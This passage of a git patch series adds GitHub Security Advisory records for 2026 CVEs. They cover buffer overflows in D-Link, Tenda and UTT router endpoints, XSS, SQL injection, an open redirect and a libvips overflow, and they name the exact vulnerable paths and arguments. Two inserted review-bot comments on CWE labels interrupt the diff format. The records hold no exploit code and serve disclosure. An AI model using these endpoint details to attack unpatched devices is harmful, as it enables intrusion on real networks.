+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2898"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/I4m6da/CVE/issues/5"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/I4m6da/CVE/issues/5#issue-3890444166"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347209"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347209"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.753976"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-20"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T01:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-jcjg-5j5x-r2hc/GHSA-jcjg-5j5x-r2hc.json b/advisories/unreviewed/2026/02/GHSA-jcjg-5j5x-r2hc/GHSA-jcjg-5j5x-r2hc.json
new file mode 100644
index 0000000000000..6ebb73c1982d1
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jcjg-5j5x-r2hc/GHSA-jcjg-5j5x-r2hc.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jcjg-5j5x-r2hc",
+ "modified": "2026-02-22T03:30:26Z",
+ "published": "2026-02-22T03:30:26Z",
+ "aliases": [
+ "CVE-2026-2904"
+ ],
+ "details": "A vulnerability was determined in UTT HiPER 810G 1.7.7-171114. This affects the function strcpy of the file /goform/ConfigExceptAli. Executing a manipulation can lead to buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2904"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347213"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347213"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755113"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuln.ricky.place/UTT/HiPER%20810G"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T01:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-jgr4-277v-42mv/GHSA-jgr4-277v-42mv.json b/advisories/unreviewed/2026/02/GHSA-jgr4-277v-42mv/GHSA-jgr4-277v-42mv.json
new file mode 100644
index 0000000000000..b4a317fb54dc5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jgr4-277v-42mv/GHSA-jgr4-277v-42mv.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jgr4-277v-42mv",
+ "modified": "2026-02-22T03:30:27Z",
+ "published": "2026-02-22T03:30:26Z",
+ "aliases": [
+ "CVE-2026-2907"
+ ],
+ "details": "A weakness has been identified in Tenda HG9 300001138. Affected by this vulnerability is an unknown functionality of the file /boaform/formgponConf of the component GPON Configuration Endpoint. This manipulation of the argument fmgpon_loid/fmgpon_loid_password causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2907"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/QIU-DIE/cve-nneeww/issues/9"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347216"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347216"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755201"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.tenda.com.cn"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T02:16:57Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-rfh7-7v27-6p9r/GHSA-rfh7-7v27-6p9r.json b/advisories/unreviewed/2026/02/GHSA-rfh7-7v27-6p9r/GHSA-rfh7-7v27-6p9r.json
new file mode 100644
index 0000000000000..5d1358d27bb9a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-rfh7-7v27-6p9r/GHSA-rfh7-7v27-6p9r.json
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfh7-7v27-6p9r", + "modified": "2026-02-22T03:30:26Z", + "published": "2026-02-22T03:30:26Z", + "aliases": [ + "CVE-2026-2897" + ], + "details": "A security vulnerability has been detected in funadmin up to 7.1.0-rc4. This vulnerability affects unknown code of the file app/backend/view/index/index.html of the component Backend Interface. The manipulation of the argument Value leads to cross site scripting. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2897" + }, + { + "type": "WEB", + "url": "https://github.com/I4m6da/CVE/issues/4" + }, + { + "type": "WEB", + "url": "https://github.com/I4m6da/CVE/issues/4#issue-3890421022" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347208" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347208" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753975" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T01:16:00Z" + } +} \ No newline at end of file From 1b8b37e8cccb8b1fbe9c05031c0d49992faa75f7 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 06:31:29 +0000 Subject: [PATCH 42/77] Publish Advisories GHSA-c324-4x25-3fp3 GHSA-c8cm-m492-rqr8 GHSA-f565-6pjw-3whr GHSA-fxq4-96xx-h92h GHSA-m87m-887p-w3r5 GHSA-mmwr-f26g-hp2q GHSA-pp46-7w92-4xvf GHSA-qf2x-h525-fc86 GHSA-qjwf-h778-47mm GHSA-v4fw-f854-rf72 --- .../GHSA-c324-4x25-3fp3.json | 56 +++++++++++++++ .../GHSA-c8cm-m492-rqr8.json | 56 +++++++++++++++ .../GHSA-f565-6pjw-3whr.json | 29 ++++++++ .../GHSA-fxq4-96xx-h92h.json | 56 +++++++++++++++ .../GHSA-m87m-887p-w3r5.json | 56 +++++++++++++++ .../GHSA-mmwr-f26g-hp2q.json | 56 +++++++++++++++ .../GHSA-pp46-7w92-4xvf.json | 56 +++++++++++++++ .../GHSA-qf2x-h525-fc86.json | 56 +++++++++++++++ .../GHSA-qjwf-h778-47mm.json | 68 +++++++++++++++++++ .../GHSA-v4fw-f854-rf72.json | 56 +++++++++++++++ 10 files changed, 545 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-c324-4x25-3fp3/GHSA-c324-4x25-3fp3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c8cm-m492-rqr8/GHSA-c8cm-m492-rqr8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fxq4-96xx-h92h/GHSA-fxq4-96xx-h92h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m87m-887p-w3r5/GHSA-m87m-887p-w3r5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mmwr-f26g-hp2q/GHSA-mmwr-f26g-hp2q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qf2x-h525-fc86/GHSA-qf2x-h525-fc86.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qjwf-h778-47mm/GHSA-qjwf-h778-47mm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v4fw-f854-rf72/GHSA-v4fw-f854-rf72.json 
diff --git a/advisories/unreviewed/2026/02/GHSA-c324-4x25-3fp3/GHSA-c324-4x25-3fp3.json b/advisories/unreviewed/2026/02/GHSA-c324-4x25-3fp3/GHSA-c324-4x25-3fp3.json new file mode 100644 index 0000000000000..69f0736d178f6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c324-4x25-3fp3/GHSA-c324-4x25-3fp3.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c324-4x25-3fp3", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2929" + ], + "details": "A vulnerability was determined in D-Link DWR-M960 1.01.07. Impacted is the function sub_453140 of the file /boafrm/formWlAc of the component Wireless Access Control Endpoint. This manipulation of the argument submit-url causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2929" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/24" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347276" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347276" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754503" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T06:16:03Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2026/02/GHSA-c8cm-m492-rqr8/GHSA-c8cm-m492-rqr8.json b/advisories/unreviewed/2026/02/GHSA-c8cm-m492-rqr8/GHSA-c8cm-m492-rqr8.json new file mode 100644 index 0000000000000..027db9ce82a37 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c8cm-m492-rqr8/GHSA-c8cm-m492-rqr8.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c8cm-m492-rqr8", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2927" + ], + "details": "A vulnerability has been found in D-Link DWR-M960 1.01.07. This vulnerability affects the function sub_462590 of the file /boafrm/formOpMode of the component Operation Mode Configuration Endpoint. The manipulation of the argument submit-url leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2927" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/22" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347274" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347274" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754499" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T05:16:19Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json b/advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json
new file mode 100644
index 0000000000000..9d5c56f007d84
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json
@@ -0,0 +1,29 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f565-6pjw-3whr",
+ "modified": "2026-02-22T06:30:17Z",
+ "published": "2026-02-22T06:30:17Z",
+ "aliases": [
+ "CVE-2026-1369"
+ ],
+ "details": "The Conditional CAPTCHA WordPress plugin through 4.0.0 does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1369"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wpscan.com/vulnerability/5a275725-85f2-4463-880b-9473dbdfa8e0"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T06:16:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fxq4-96xx-h92h/GHSA-fxq4-96xx-h92h.json b/advisories/unreviewed/2026/02/GHSA-fxq4-96xx-h92h/GHSA-fxq4-96xx-h92h.json
new file mode 100644
index 0000000000000..1c750d44b58d2
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fxq4-96xx-h92h/GHSA-fxq4-96xx-h92h.json
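Review bot: GHSA-f565-6pjw-3whr is published with `"severity": []`, `"cwe_ids": []` and `"severity": null`, so triage tooling that sorts or filters on those fields will treat it as unrated rather than as the open redirect the `details` text describes. The weakness is stated plainly enough to classify now: `"cwe_ids": ["CWE-601"]`. A CVSS vector should wait for the NVD or CNA score rather than be guessed, and until one arrives the empty rating should not be read as low risk.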
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fxq4-96xx-h92h", + "modified": "2026-02-22T06:30:16Z", + "published": "2026-02-22T06:30:16Z", + "aliases": [ + "CVE-2026-2910" + ], + "details": "A flaw has been found in Tenda HG9 300001138. This vulnerability affects unknown code of the file /boaform/formPing6. Executing a manipulation of the argument pingAddr can lead to stack-based buffer overflow. The attack may be performed from remote. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2910" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/12" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347219" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347219" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755212" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T04:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m87m-887p-w3r5/GHSA-m87m-887p-w3r5.json b/advisories/unreviewed/2026/02/GHSA-m87m-887p-w3r5/GHSA-m87m-887p-w3r5.json new file mode 100644 index 0000000000000..144e5a29b5f03 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m87m-887p-w3r5/GHSA-m87m-887p-w3r5.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m87m-887p-w3r5", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2926" + ], + "details": "A flaw has been found in D-Link DWR-M960 1.01.07. This affects the function sub_4237AC of the file /boafrm/formLteSetup of the component LTE Configuration Endpoint. Executing a manipulation of the argument submit-url can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2926" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/21" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347273" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347273" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754498" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T05:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mmwr-f26g-hp2q/GHSA-mmwr-f26g-hp2q.json b/advisories/unreviewed/2026/02/GHSA-mmwr-f26g-hp2q/GHSA-mmwr-f26g-hp2q.json new file mode 100644 index 0000000000000..260d8b3e8f042 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mmwr-f26g-hp2q/GHSA-mmwr-f26g-hp2q.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mmwr-f26g-hp2q", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2928" + ], + "details": "A vulnerability was found in D-Link DWR-M960 1.01.07. This issue affects the function sub_452CCC of the file /boafrm/formWlEncrypt of the component WLAN Encryption Configuration Endpoint. The manipulation of the argument submit-url results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2928" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/23" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347275" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347275" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754500" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T05:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json b/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json new file mode 100644 index 0000000000000..d54576b1272d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json 
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pp46-7w92-4xvf",
+ "modified": "2026-02-22T06:30:17Z",
+ "published": "2026-02-22T06:30:17Z",
+ "aliases": [
+ "CVE-2026-2912"
+ ],
+ "details": "A vulnerability was found in code-projects Online Reviewer System 1.0. Impacted is an unknown function of the file /system/system/students/assessments/results/studentresult-view.php. The manipulation of the argument test_id results in sql injection. It is possible to launch the attack remotely. The exploit has been made public and could be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2912"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/tiancesec/CVE/issues/25"
+ },
+ {
+ "type": "WEB",
+ "url": "https://code-projects.org"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347221"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347221"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755219"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T04:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-qf2x-h525-fc86/GHSA-qf2x-h525-fc86.json b/advisories/unreviewed/2026/02/GHSA-qf2x-h525-fc86/GHSA-qf2x-h525-fc86.json
new file mode 100644
index 0000000000000..4f872e4d5694e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-qf2x-h525-fc86/GHSA-qf2x-h525-fc86.json
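Review bot: `cwe_ids` in GHSA-pp46-7w92-4xvf is `CWE-74` (generic injection) while the `details` text names SQL injection through the `test_id` argument. The specific identifier is `"CWE-89"`; with only the generic one, a query for SQL injection advisories misses this record. The value looks inherited from the upstream CVE record, so it is worth correcting at the source too.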
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qf2x-h525-fc86", + "modified": "2026-02-22T06:30:16Z", + "published": "2026-02-22T06:30:16Z", + "aliases": [ + "CVE-2026-2911" + ], + "details": "A vulnerability has been found in Tenda FH451 up to 1.0.0.9. This issue affects some unknown processing of the file /goform/GstDhcpSetSer. The manipulation leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2911" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347220" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347220" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755218" + }, + { + "type": "WEB", + "url": "https://vuln.ricky.place/Tenda/FH451" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T04:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qjwf-h778-47mm/GHSA-qjwf-h778-47mm.json b/advisories/unreviewed/2026/02/GHSA-qjwf-h778-47mm/GHSA-qjwf-h778-47mm.json new file mode 100644 index 0000000000000..b05d3ba2857fa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qjwf-h778-47mm/GHSA-qjwf-h778-47mm.json 
@@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qjwf-h778-47mm", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2913" + ], + "details": "A vulnerability was determined in libvips up to 8.19.0. The affected element is the function vips_source_read_to_memory of the file libvips/iofuncs/source.c. This manipulation causes heap-based buffer overflow. It is possible to launch the attack on the local host. The attack's complexity is rated as high. The exploitability is described as difficult. The exploit has been publicly disclosed and may be utilized. Patch name: a56feecbe9ed66521d9647ec9fbcd2546eccd7ee. Applying a patch is the recommended action to fix this issue. The confirmation of the bugfix mentions: \"[T]he impact of this is negligible, since this only affects custom seekable sources larger than 4 GiB (and the crash occurs in user code rather than libvips itself).\"", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2913" + }, + { + "type": "WEB", + "url": "https://github.com/libvips/libvips/issues/4857" + }, + { + "type": "WEB", + "url": "https://github.com/libvips/libvips/issues/4857#issue-3920154326" + }, + { + "type": "WEB", 